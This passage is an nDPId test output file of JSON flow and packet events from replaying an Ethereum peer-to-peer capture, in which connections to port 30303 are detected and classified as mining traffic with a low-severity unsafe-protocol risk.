00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1578508365154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365154,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4TfAqAG4iskMV91Ldl\/HR3E5AAAAALAC\/\/+X6AAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365169,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365169,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
